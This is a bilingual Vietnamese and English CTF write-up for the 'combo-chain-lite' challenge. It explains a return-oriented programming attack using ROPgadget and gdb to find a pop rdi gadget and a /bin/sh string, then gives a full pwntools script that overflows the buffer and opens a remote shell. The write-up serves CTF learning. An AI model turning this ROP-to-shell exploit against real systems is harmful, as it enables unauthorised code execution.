[ENGLISH BELOW]
Xin chào. Hôm nay mình muốn viết lại challenge này.
combo-chain-lite.c combo-chain-lite
Chall sử dụng ROP (Return Oriented Programming). Nên trước tiên ta tìm địa chỉ chứa ROP gadgets phù hợp.
Trong quy ước gọi (calling conventions), các đối số được truyền vào các registers trong các chương trình 64-bit theo thứ tự như link tham khảo. Trong trường hợp của gọi system, thì chúng ta cần phải điều khiển thanh ghi RDI. Mình sẽ tìm các ROP gadgets thông qua tool như rp++ hoặc ROPgadget liên quan tới pop rdi.
ROPgadget --binary ./combo-chain-lite | grep “pop rdi”
Khi đã có được địa chỉ của ROP, ta sẽ cần tìm địa chỉ của hàm system khi được nạp vào chương trình khi được thực thi. Tuy nhiên ở đây chương trình đã cung cấp sẵn cho ta.
Tiếp theo ta cần tìm cách đưa chuỗi “/bin/sh” vào như đối số của system.
Nếu để ý thì trong chương trình đã có sẵn chuỗi đó, việc cần làm là tìm địa chỉ của nó trong chương trình mà thôi.
Có thể dùng gef hoặc gdb-peda.
-Đối với gef:
1
2
3
4
5
6
7
$ gdb ./combo-chain-lite
gef➤  r
...
gef➤  grep /bin/sh
[+] Searching '/bin/sh' in memory
[+] In '/home/node/tmp/combo-chain-lite'(0x402000-0x403000), permission=r--
  0x402051 - 0x402058  →   "/bin/sh"
-Đối với gdb-peda:
1
2
3
4
5
6
7
8
9
10
$ gdb ./combo-chain-lite
gdb-peda$ b*0x0000000000401209  #đặt breakpoint ở đoạn instruction sau khi in chuỗi
gdb-peda$ r
...
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
combo-chain-lite : 0x402051 --> 0x68732f6e69622f ('/bin/sh')
combo-chain-lite : 0x403051 --> 0x68732f6e69622f ('/bin/sh')
            libc : 0x7ffff7f67e80 --> 0x68732f6e69622f ('/bin/sh')
Đoạn code exploit của mình:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#Completed
from pwn import *
rm = remote("pwn.hsctf.com", 3131)
padding = "AAA%AAsAABAA$AAn" #16 ki tu (random pattern)
rop_addr = p64(0x0000000000401273)
bin_addr = p64(0x402051) #hoac 0x403051 /bin/sh string
sys_addr = p64(int(rm.recv().rsplit(': ')[1], 16)) 
payload = padding + rop_addr  + bin_addr + sys_addr
print payload
rm.recv()
rm.sendline(payload)
rm.interactive()
rm.close()

Done.
ENGLISH
Hello everyone, here is the challenge:
Challenge uses ROP (Return Oriented Programming). So first we need to find right ROP gadgets addresses.
In (calling conventions), arguments are passed in registers in 64-bit programs. In the case of running system, this means we will need to find a way to control the RDI register. We will find ROP gadgets through tools like rp++ or ROPgadget that have pop rdi.
ROPgadget --binary ./combo-chain-lite | grep “pop rdi”
After having ROP address, we need to find the address of system function that imported when executing the program. But here, the program has provided for us.
Next, try to figure out how to put the string “/bin/sh” as system’s argument.
If you look closer, in the program already has that string, we only need to figure out the address of it.
We can use gef or gdb-peda.
-With gef:
1
2
3
4
5
6
7
$ gdb ./combo-chain-lite
gef➤  r
...
gef➤  grep /bin/sh
[+] Searching '/bin/sh' in memory
[+] In '/home/node/tmp/combo-chain-lite'(0x402000-0x403000), permission=r--
  0x402051 - 0x402058  →   "/bin/sh"
-With gdb-peda:
1
2
3
4
5
6
7
8
9
10
$ gdb ./combo-chain-lite
gdb-peda$ b*0x0000000000401209  #đặt breakpoint ở đoạn instruction sau khi in chuỗi
gdb-peda$ r
...
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
combo-chain-lite : 0x402051 --> 0x68732f6e69622f ('/bin/sh')
combo-chain-lite : 0x403051 --> 0x68732f6e69622f ('/bin/sh')
            libc : 0x7ffff7f67e80 --> 0x68732f6e69622f ('/bin/sh')
My exploit code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#Completed
from pwn import *
rm = remote("pwn.hsctf.com", 3131)
padding = "AAA%AAsAABAA$AAn" #16 ki tu (random pattern)
rop_addr = p64(0x0000000000401273)
bin_addr = p64(0x402051) #hoac 0x403051 /bin/sh string
sys_addr = p64(int(rm.recv().rsplit(': ')[1], 16)) 
payload = padding + rop_addr  + bin_addr + sys_addr
print payload
rm.recv()
rm.sendline(payload)
rm.interactive()
rm.close()

Done.